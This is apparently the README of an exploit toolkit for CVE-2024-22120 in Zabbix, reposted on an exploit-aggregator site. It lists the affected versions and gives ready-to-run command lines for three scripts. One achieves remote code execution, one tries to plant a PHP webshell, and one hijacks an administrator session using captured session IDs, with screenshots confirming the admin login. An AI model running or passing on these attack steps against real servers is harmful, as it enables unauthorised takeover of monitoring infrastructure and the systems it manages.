## https://sploitus.com/exploit?id=2C28432E-ECDE-590F-BBF9-D078125AF659
# CVE-2024-22120 ToolKit
# Affected Version/s
```
6.0.0 - 6.0.27
6.4.0 - 6.4.12
7.0.0alpha1
```
# Credit
https://x.com/mf0cuz
> https://support.zabbix.com/browse/ZBX-24505
> https://packetstormsecurity.com/files/137454/Zabbix-3.0.3-Remote-Command-Execution.html
# Premise
- a low-privilege user
- Have permission to execute scripts
![](https://cdn.jsdelivr.net/gh/W01fh4cker/blog_image@main/image-20240520113821013.png)
# Usage
## CVE-2024-22120-RCE
Capture packets to obtain sessionid and hostid:
![](https://cdn.jsdelivr.net/gh/W01fh4cker/blog_image@main/image-20240520113103613.png)
```
python -m pip install requests pwntools
python CVE-2024-22120-RCE.py --ip 192.168.198.136 --sid f026d1c7a3c36537cfe78fed35c7456a --hostid 10084
```
![](https://cdn.jsdelivr.net/gh/W01fh4cker/blog_image@main/image-20240520112956658.png)
## CVE-2024-22120-Webshell(Unable to use in most cases)
if you already have a session ID of Administrator privileged user, try:
```shell
python CVE-2024-22120-Webshell.py --ip 192.168.198.136 --aid fe647173d7769d55a43f161a68b256e0 --hostid 10084 --file shell.php
```
else:
```shell
python CVE-2024-22120-Webshell.py --ip 192.168.198.136 --sid f026d1c7a3c36537cfe78fed35c7456a --hostid 10084 --shell shell.php
```
But almost most of them cannot be written to the webshell through echo, because the execution user is zabbix:
![](https://cdn.jsdelivr.net/gh/W01fh4cker/blog_image@main/image-20240520160457471.png)
## CVE-2024-22120-LoginAsAdmin
```shell
python CVE-2024-22120-LoginAsAdmin.py --ip 192.168.198.136 --sid decf4ef56988027d62ca1db2a00d8346 --hostid 10084
```
![](https://cdn.jsdelivr.net/gh/W01fh4cker/blog_image@main/image-20240520175955624.png)
test:
![](https://cdn.jsdelivr.net/gh/W01fh4cker/blog_image@main/image-20240520180010132.png)
replace then refresh:
![](https://cdn.jsdelivr.net/gh/W01fh4cker/blog_image@main/image-20240520180055161.png)
login as admin!!!
![](https://cdn.jsdelivr.net/gh/W01fh4cker/blog_image@main/image-20240520180339314.png)